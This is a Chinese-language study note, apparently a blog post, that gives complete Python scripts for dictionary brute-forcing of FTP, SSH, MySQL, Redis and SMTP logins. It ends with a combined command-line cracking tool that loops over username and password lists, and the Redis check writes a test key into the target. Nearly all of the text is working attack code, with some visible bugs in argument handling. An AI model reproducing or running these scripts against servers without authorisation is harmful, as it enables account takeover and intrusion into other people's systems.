用途:个人学习笔记,有所借鉴,欢迎指正!
目录
一、Python-文件传输爆破-ftplib库操作ftp协议
二、Python-登录爆破-paramiko库操作ssh协议
三、Python-数据库爆破-pymysqlj库操作mysql协议
四、Python-数据库爆破-redis库操作redist协议
五、Python-邮件爆破-smtplib库操作smtp协议
前言:
原理:python的一些库支持FTP、SSH、Redis、SMTP、Mysql等协议远程登录,只需要知道该服务器ip和端口,然后用本机准备好的用户名字典和密码字典进行循环组合尝试爆破登录,其中字典的好坏决定成功的几率,可以尝试弱口令集和社工方式获取,当然也不一定能成功,这只是锄头,挖不挖的进取决于是什么地。
一、Python-文件传输爆破-ftplib库操作ftp协议
FTP服务默认端口:21
1、关键代码解释:
python
from ftplib import FTP
ftp = FTP()
ftp.connect(ip, 21) #连接ftp服务器ip和端口
ftp.login(username,password) #尝试用户名和密码远程登录
2、完整代码:
python
from ftplib import FTP
import os
def ftp_check(ip,username,password):
ftp = FTP()
print('check->'+ip+'|'+username+'|'+password)
try:
ftp.connect(ip, 21)
ftp.login(username,password)
print('success')
exit()
except Exception as e:
print('failed')
if __name__ == '__main__':
pypath = os.getcwd() #当前工作目录
ip=input('please input ftp ip:')
#注意修改自己字典的存放目录
for username in open(pypath+'/dic/ftp_username.txt'):
username=username.replace('\n','')
for password in open(pypath+'/dic/ftp_password.txt'):
password=password.replace('\n','')
ftp_check(ip,username,password)
二、Python-登录爆破-paramiko库操作ssh协议
ssh服务默认端口:22
1、关键代码解释:
python
import paramiko
#获取SSH客户端对象
ssh = paramiko.SSHClient()
# 允许连接不在know_hosts文件中的主机
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#使用用户名和密码远程连接
ssh.connect(ip,"22",username,password)
2、完整代码:
python
import paramiko,os
def ssh_check(ip,username,password):
print('check->' + ip + '|' + username + '|' + password)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip,"22",username,password)
print('success')
exit()
except Exception as e:
print('failed')
if __name__ == '__main__':
pypath = os.getcwd() #当前工作目录
ip = input('please input ssh ip:')
#注意修改自己字典的存放目录
for username in open(pypath + '/dic/ssh_username.txt'):
username = username.replace('\n', '')
for password in open(pypath + '/dic/ssh_password.txt'):
password = password.replace('\n', '')
ssh_check(ip,username,password)
三、Python-数据库爆破-pymysqlj库操作mysql协议
mysql服务默认端口:3306
1、关键代码解释:
python
import pymysql
#远程连接Myql服务
conn_obj = pymysql.connect(
host=ip, # MySQL服务端的IP地址
port=3306, # MySQL默认PORT地址(端口号)
user=username, # 用户名
password=password, # 密码,也可以简写为passwd
database='mysql', # 库名称,也可以简写为db
charset='utf8' # 字符编码
)
2、完整代码:
python
import pymysql,os
def mysql_check(ip,username,password):
print('check->' + ip + '|' + username + '|' + password)
try:
conn_obj = pymysql.connect(
host=ip,
port=3306,
user=username,
password=password,
database='mysql',
charset='utf8'
)
print('success')
exit()
except Exception as e:
pass
if __name__ == '__main__':
pypath = os.getcwd() #当前工作目录
ip = input('please input ssh ip:')
#注意修改自己字典的存放目录
for username in open(pypath + '/dic/mysql_username.txt'):
username = username.replace('\n', '')
for password in open(pypath + '/dic/mysql_password.txt'):
password = password.replace('\n', '')
mysql_check(ip,username,password)
四、Python-数据库爆破-redis库操作redist协议
redis服务默认端口:6379,远程登录不需要账号,只要密码
1、关键代码解释:
python
import redis
#远程连接redis服务
redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
redis_conn.set('test', 'laowang') #存入键,测试密码是否正确,若错误则存入失败报错
2、完整代码:
python
import redis,os
def redis_check(ip,password):
print('check->' + ip + '|' + password)
try:
redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
redis_conn.set('test', 'laowang')
print('success')
exit()
except Exception as e:
pass
if __name__ == '__main__':
pypath = os.getcwd() #当前工作目录
ip = input('please input ssh ip:')
#注意修改字典所在目录
for password in open(pypath + '/dic/redis_password.txt'):
password = password.replace('\n', '')
redis_check(ip, password)
五、Python-邮件爆破-smtplib库操作smtp协议
smtp服务默认端口:25
1、关键代码解释:
python
import smtplib
#获取smtp客户端对象
smtpObj = smtplib.SMTP()
#远程连接SMTP服务, 25 为 SMTP 端口号
smtpObj.connect('smtp.'+ip, 25)
#用户名和密码尝试登录
smtpObj.login(username, password)
2、完整代码:
python
import smtplib,os
def email_check(ip,username,password):
print('check->' + ip + '|' +username+'|'+ password)
try:
smtpObj = smtplib.SMTP()
smtpObj.connect('smtp.'+ip, 25)
smtpObj.login(username, password)
print('ok')
exit()
except smtplib.SMTPException:
print("Error")
if __name__ == '__main__':
pypath = os.getcwd() #当前工作目录
#注意修改字典所在目录
for username in open(pypath + '/dic/email_username.txt'):
username = username.replace('\n', '')
ip=username.split('@')[1]
for password in open(pypath + '/dic/email_password.txt'):
password = password.replace('\n', '')
email_check(ip, username, password)
六、整合五种协议爆破完整脚本
from ftplib import FTP
import paramiko
import pymysql
import redis
import smtplib
import os,sys
def ftp_check(ip,username,password):
ftp = FTP()
print('check->'+ip+'|'+username+'|'+password)
try:
ftp.connect(ip, 21)
ftp.login(username,password)
print('success')
exit()
except Exception as e:
print('failed')
def ssh_check(ip,username,password):
print('check->' + ip + '|' + username + '|' + password)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip,"22",username,password)
print('success')
exit()
except Exception as e:
print('failed')
def mysql_check(ip,username,password):
print('check->' + ip + '|' + username + '|' + password)
try:
conn_obj = pymysql.connect(
host=ip, # MySQL服务端的IP地址
port=3306, # MySQL默认PORT地址(端口号)
user=username, # 用户名
password=password, # 密码,也可以简写为passwd
database='mysql', # 库名称,也可以简写为db
charset='utf8' # 字符编码
)
print('success')
exit()
except Exception as e:
pass
def redis_check(ip,password):
print('check->' + ip + '|' + password)
try:
redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
redis_conn.set('test', 'xiaodi')
print('success')
exit()
except Exception as e:
pass
def email_check(ip,username,password):
print('check->' + ip + '|' +username+'|'+ password)
try:
smtpObj = smtplib.SMTP()
smtpObj.connect('smtp.'+ip, 25) # 25 为 SMTP 端口号
smtpObj.login(username, password)
print('ok')
exit()
except smtplib.SMTPException:
print("Error")
if __name__ == '__main__':
pypath = os.getcwd()
print('eg:固定字典使用说明:')
print('python all.py ftp 127.0.0.1')
print('python all.py ssh 127.0.0.1')
print('python all.py redis 127.0.0.1')
print('python all.py mysql 127.0.0.1')
print('python all.py email')
print('eg:自定义字典使用说明:')
print('python all.py ftp 127.0.0.1 user.txt pass.txt')
print('python all.py ssh 127.0.0.1 user.txt pass.txt')
print('python all.py redis 127.0.0.1 user.txt pass.txt')
print('python all.py mysql 127.0.0.1 user.txt pass.txt')
print('python all.py email user.txt pass.txt')
xy=sys.argv[1]
ip=sys.argv[2]
zidian = sys.argv[3]
zidian2=sys.argv[4]
#没有设置自定义字典,采用固定字典
if len(zidian)==0:
if xy=='ftp':
for username in open(pypath + '/conf/dic_username_ftp.txt'):
username = username.replace('\n', '')
for password in open(pypath + '/conf/dic_password_ftp.txt'):
password = password.replace('\n', '')
ftp_check(ip, username, password)
elif xy=='ssh':
for username in open(pypath + '/conf/dic_username_ssh.txt'):
username = username.replace('\n', '')
for password in open(pypath + '/conf/dic_password_ssh.txt'):
password = password.replace('\n', '')
ssh_check(ip, username, password)
elif xy=='mysql':
for username in open(pypath + '/conf/dic_username_mysql.txt'):
username = username.replace('\n', '')
for password in open(pypath + '/conf/dic_password_mysql.txt'):
password = password.replace('\n', '')
mysql_check(ip, username, password)
elif xy=='redis':
for password in open(pypath + '/conf/dic_password_redis.txt'):
password = password.replace('\n', '')
redis_check(ip, password)
elif xy=='email':
for username in open(pypath + '/conf/dic_username_email.txt'):
username = username.replace('\n', '')
ip = username.split('@')[1]
for password in open(pypath + '/conf/dic_password_email.txt'):
password = password.replace('\n', '')
email_check(ip, username, password)
#设置了自定义字典,自定义字典爆破(代码只修改的ftp)
else:
if xy=='ftp':
for username in open(pypath +'\\'+ zidian):
username = username.replace('\n', '')
for password in open(pypath +'\\'+ zidian2):
password = password.replace('\n', '')
ftp_check(ip, username, password)
elif xy=='ssh':
for username in open(pypath + '/conf/dic_username_ssh.txt'):
username = username.replace('\n', '')
for password in open(pypath + '/conf/dic_password_ssh.txt'):
password = password.replace('\n', '')
ssh_check(ip, username, password)
elif xy=='mysql':
for username in open(pypath + '/conf/dic_username_mysql.txt'):
username = username.replace('\n', '')
for password in open(pypath + '/conf/dic_password_mysql.txt'):
password = password.replace('\n', '')
mysql_check(ip, username, password)
elif xy=='redis':
for password in open(pypath + '/conf/dic_password_redis.txt'):
password = password.replace('\n', '')
redis_check(ip, password)
elif xy=='email':
for username in open(pypath + '/conf/dic_username_email.txt'):
username = username.replace('\n', '')
ip = username.split('@')[1]
for password in open(pypath + '/conf/dic_password_email.txt'):
password = password.replace('\n', '')
email_check(ip, username, password)